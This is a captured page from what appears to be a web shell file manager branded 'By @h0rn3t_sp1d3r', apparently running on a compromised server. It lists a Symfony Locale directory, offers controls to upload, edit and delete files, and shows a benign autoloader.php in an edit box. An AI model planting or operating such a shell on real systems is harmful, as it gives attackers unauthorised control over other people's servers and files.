📁 File Manager By @h0rn3t_sp1d3r
📂 Change Directory:
Go
/
/
opt
/
alt
/
php55
/
usr
/
share
/
pear
/
Symfony
/
Component
/
Locale
/
[ HOME ]
⬅️ [ PARENT DIR ]
📤 Upload
<?php spl_autoload_register(function ($class) { if ('\\' == $class[0]) { $class = substr($class, 1); } if ( 0 === strpos($class, 'Symfony\\Component\\Locale\\') && file_exists($file = __DIR__.'/../../../'.str_replace('\\', '/', $class).'.php') ) { require_once $file; } });
💾 Save
Name
Size (kB)
Modified
Year
Perms
Actions
📁 ..
-
2024-05-04 23:47:38
2024
Set
-
📁 Exception
-
2024-05-04 23:47:38
2024
Set
-
📁 Stub
-
2024-05-04 23:47:38
2024
Set
-
📄 Locale.php
5.16
2019-12-18 11:24:06
2019
Set
✏️ Edit
|
🗑️
|
⬇️
|
✏️
📄 autoloader.php
0.33
2019-12-18 11:24:06
2019
Set
✏️ Edit
|
🗑️
|
⬇️
|
✏️